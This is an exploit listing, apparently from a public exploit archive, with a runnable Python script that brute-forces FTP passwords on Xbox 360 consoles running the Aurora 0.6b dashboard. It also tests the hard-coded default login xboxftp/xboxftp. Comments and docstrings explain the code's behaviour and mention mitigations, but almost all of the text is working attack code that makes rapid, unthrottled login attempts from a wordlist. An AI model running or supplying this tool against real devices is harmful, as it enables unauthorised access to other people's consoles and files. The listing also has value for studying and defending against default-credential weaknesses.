# Exploit Title: XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce
# Date: 20/12/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: http://phoenix.xboxunity.net/#/news
# Tested on: XBOX 360
# GREETZ: Iker Legorreta, #RemoteExecution Team



#!/usr/bin/env python
# -*- coding:utf-8 -*-

__author__ = 'Daniel Godoy'

import argparse
import sys
from ftplib import FTP

# Usage banner printed by help(). The parser further down registers the long
# option as --username; the "--user" spelling shown here is accepted only
# because argparse resolves unambiguous prefixes of long options. The -h/--help
# switch is handled by argparse itself, which prints its own generated help
# rather than this banner.
info = '''
XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce
Usage: ./xbox_ftp_brute_forcer.py [options]
Options: -t, --target <hostname/ip> | Target
-u, --user <user> | User
-w, --wordlist <filename> | Wordlist
-h, --help <help> | print help

Example: ./xbox_ftp_brute_forcer.py -t 192.168.1.1 -u root -w
/root/Desktop/wordlist.txt
'''


def help():
    """Print the usage banner and end the process with exit status 0.

    The name shadows the ``help`` builtin for the rest of this module.
    """
    print(info)
    raise SystemExit(0)


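def check_default_login(target):
    """Report whether the FTP service on ``target`` accepts the built-in account.

    A single login is attempted with the default pair ``xboxftp`` /
    ``xboxftp``. When it succeeds, anyone who can reach the FTP port can log
    in without guessing, so the unchanged default account is the finding to
    act on: change or disable it if the dashboard version in use offers that
    setting (to be confirmed on the device), and keep the port off untrusted
    networks.

    Args:
        target: Hostname or IP address handed to ``ftplib.FTP``.

    Returns:
        None. A successful login is reported on stdout; a refused login or
        an unreachable host produces no output.
    """
    try:
        ftp = FTP(target)
        ftp.login('xboxftp', 'xboxftp')
        # The session is closed exactly once. The original called quit() a
        # second time after printing; that call failed on the already closed
        # connection and the failure was hidden by a bare except.
        ftp.quit()
    except Exception:
        # Exception instead of a bare except: Ctrl-C and SystemExit are no
        # longer swallowed while still treating any FTP or socket failure as
        # "default login not available".
        return

    print(" [+] Default login is open.")
    print(" [+] Username : xboxftp")
    print(" [+] Password : xboxftp ")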


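def ftp_login(target, username, password):
    """Attempt one FTP login and report whether the server accepted it.

    Every call opens its own connection to ``target``, so on the server side
    a wordlist run appears as a series of separate sessions from one source,
    each ending in a failed login until (and unless) one succeeds.

    Args:
        target: Hostname or IP address handed to ``ftplib.FTP``.
        username: Account name sent to the server.
        password: Password sent to the server.

    Returns:
        True when connect, login and quit all succeed (the credentials are
        also printed), False on any failure. A network error and a rejected
        password are not distinguished.
    """
    try:
        ftp = FTP(target)
        ftp.login(username, password)
        ftp.quit()
    except Exception:
        # Exception instead of a bare except, so an interrupt from the
        # operator is not recorded as just another failed password.
        return False

    print(" [*] Credentials have found.")
    print(" [*] Username : {}".format(username))
    print(" [*] Password : {}".format(password))
    return True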


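def brute_force(target, username, wordlist):
    """Try each line of a wordlist file as the FTP password for ``username``.

    Lines are stripped of surrounding whitespace and passed to ``ftp_login``
    one at a time, in file order; the loop stops at the first accepted
    password. Nothing in this function limits or spaces the attempts, so a
    server that logs or throttles failed logins sees them back to back.

    Args:
        target: Hostname or IP address of the FTP service.
        username: Account name used for every attempt.
        wordlist: Path of a text file with one candidate password per line.

    Returns:
        None. If the wordlist cannot be opened or read, a message is printed
        and the process exits with status 0, as in the original.
    """
    try:
        # The context manager closes the file; the original left the handle
        # open and rebound the ``wordlist`` parameter to it.
        with open(wordlist, "r") as handle:
            candidates = [line.strip() for line in handle]
    except IOError:
        # Only file access errors are reported as a wordlist problem. The
        # original wrapped the whole loop in a bare except, so any other
        # failure was mislabelled with this message.
        print(" [-] There is no such wordlist file. ")
        sys.exit(0)

    for candidate in candidates:
        if ftp_login(target, username, candidate):
            break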



# Command-line handling: a run needs target, username and wordlist together.
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target")
parser.add_argument("-u", "--username")
parser.add_argument("-w", "--wordlist")
args = parser.parse_args()

target, username, wordlist = args.target, args.username, args.wordlist

if not (target and username and wordlist):
    help()
    # help() already ends the process; this exit is never reached and only
    # mirrors the original listing.
    sys.exit(0)

# The wordlist pass runs first. brute_force() exits the process when the
# wordlist cannot be opened, in which case the default-account check below
# does not run at all.
brute_force(target, username, wordlist)
check_default_login(target)
print(" [-] Brute force finished. ")